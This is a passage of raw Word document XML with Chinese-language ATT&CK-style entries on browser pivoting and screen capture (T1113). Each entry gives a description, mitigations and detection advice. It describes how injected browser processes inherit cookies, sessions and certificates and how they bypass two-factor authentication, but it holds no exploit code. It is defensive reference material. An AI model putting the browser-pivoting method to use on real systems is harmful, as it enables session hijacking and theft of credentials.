        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C481991" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可以利用浏览器软件中的安全漏洞和固有功能，作为浏览器中间人来改变内容，修改行为，并拦截信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0509A94B" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一个具体的例子是当攻击者将恶意软件注入浏览器时，允许他们继承用户的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会话和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>客户端证书，并使用浏览器作为一种方式注入经过身份验证的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Intranet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB05F03" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00DA1092" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>浏览器</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86FA9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>透视需</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SeDebugPrivilege</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和高完整性过程来执行。浏览器流量通过设置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代理从攻击方的浏览器通过用户的浏览器转入，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代理将重定向任何</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTPS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>流量。这不会以任何方式改变用户的流量。一旦浏览器关闭，代理连接就会被切断。无论注入代理的任何浏览器进程，攻击者都会收到该进程的安全上下文。浏览器通常为每个打开的选项卡创建一个新进程，并相应地分离权限和证书。使用这些权限，攻击者可以浏览到可通过浏览器访问的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Intranet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上的任何资源，以及浏览器具有足够权限的资源，例如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Sharepoint</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>webmail</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。浏览器</w:t>
      </w:r>
      <w:r w:rsidRPr="009F4186">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>透视</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也消除了双因素身份验证提供的安全性。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F39DBD8" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1980"/>
        <w:gridCol w:w="7756"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w14:paraId="02500B7E" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="383"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="59B3BA92" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00BC3092" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:spacing w:after="312"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="39434C"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7756" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="5F09495B" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00BC3092" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:spacing w:after="312"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="39434C"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00D86FA9" w14:paraId="61F3260C" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="465"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53D595AC" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00D86FA9" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00D86FA9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户帐户管理</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7756" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43DBCA78" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00D86FA9" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00D86FA9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>由于浏览器透视需要高度完整性过程才能启动，限制用户权限和解决权限提升和绕过用户帐户控制机会可能会限制此技术的曝光。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00D86FA9" w14:paraId="2A9059BA" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="443"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48078D00" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00D86FA9" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00D86FA9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户培训</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7756" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64B90F64" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00D86FA9" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00D86FA9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>定期关闭所有浏览器会话当不再需要它们时。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7ECF0BB5" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68012878" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7A7E68" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="009F4186">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这是一种难以检测的技术，因为对手流量会被正常的用户流量掩盖。</w:t>
      </w:r>
      <w:r w:rsidRPr="009F4186">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009F4186">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>没有创建新进程，也没有其他软件接触磁盘。</w:t>
      </w:r>
      <w:r w:rsidRPr="009F4186">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009F4186">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>身份验证日志可用于审核对特定</w:t>
      </w:r>
      <w:r w:rsidRPr="009F4186">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="009F4186">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用程序的登录，但如果活动与典型用户行为相匹配，则可能难以确定恶意登录与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>正常</w:t>
      </w:r>
      <w:r w:rsidRPr="009F4186">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登录。</w:t>
      </w:r>
      <w:r w:rsidRPr="009F4186">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009F4186">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监视针对浏览器应用程序的进程注入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69500417" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>屏幕截图</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w14:paraId="63404EAD" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9736" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3DB9DBEB" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00A04C99" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A04C99">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A04C99">
              <w:t xml:space="preserve"> T1113</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E369FFD" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00A04C99" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00A04C99">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A04C99">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00A04C99">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>采集</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30A469AE" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00A04C99" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A04C99">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A04C99">
              <w:t xml:space="preserve"> Linux, macOS, Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E76F79A" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00A04C99" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A04C99">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A04C99">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00A04C99">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>API</w:t>
            </w:r>
            <w:r w:rsidRPr="00A04C99">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>监控，进程监控，文件监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25059C0C" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A04C99">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A04C99">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="35172647" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00A35399" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54244D0E" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="009F4186">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能会尝试对桌面进行屏幕捕获，以便在操作过程中收集信息。在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>入侵</w:t>
      </w:r>
      <w:r w:rsidRPr="009F4186">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后使用的远程访问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中可能会</w:t>
      </w:r>
      <w:r w:rsidRPr="009F4186">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包括屏幕捕获功能。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FACF512" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>Mac</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794264FD" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D0EC7">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="003D0EC7">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>OSX</w:t>
      </w:r>
      <w:r w:rsidRPr="003D0EC7">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>上，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003D0EC7">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>screencapture</w:t>
      </w:r>
      <w:r w:rsidRPr="003D0EC7">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>用于捕获屏幕截图。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0329399F" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F94380A" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="003D0EC7" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D0EC7">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="003D0EC7">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidRPr="003D0EC7">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>上，命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>xwd</w:t>
      </w:r>
      <w:r w:rsidRPr="003D0EC7">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5436C913" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CCCEE5" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D0EC7">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>这种类型的攻击技术无法通过预防性控制轻松缓解，因为它基于系统功能。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5029FDBC" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F7E744" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D0EC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>屏幕捕获行为的监视取决于用于从操作系统获取数据和写入输出文件的方法。</w:t>
      </w:r>
      <w:r w:rsidRPr="003D0EC7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003D0EC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检测方法可以包括使用用于获取图像数据的</w:t>
      </w:r>
      <w:r w:rsidRPr="003D0EC7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="003D0EC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用来收集来自异常进程的信息，以及监视写入磁盘的图</w:t>
      </w:r>
      <w:r w:rsidRPr="003D0EC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>像文件。</w:t>
      </w:r>
      <w:r w:rsidRPr="003D0EC7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003D0EC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>取决于给定网络环境中此行为的合法性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，监控的</w:t>
      </w:r>
      <w:r w:rsidRPr="003D0EC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据可能需要与其他事件相关联以识别恶意活动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427010F7" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>视频采集</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w14:paraId="7FD4AFC4" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
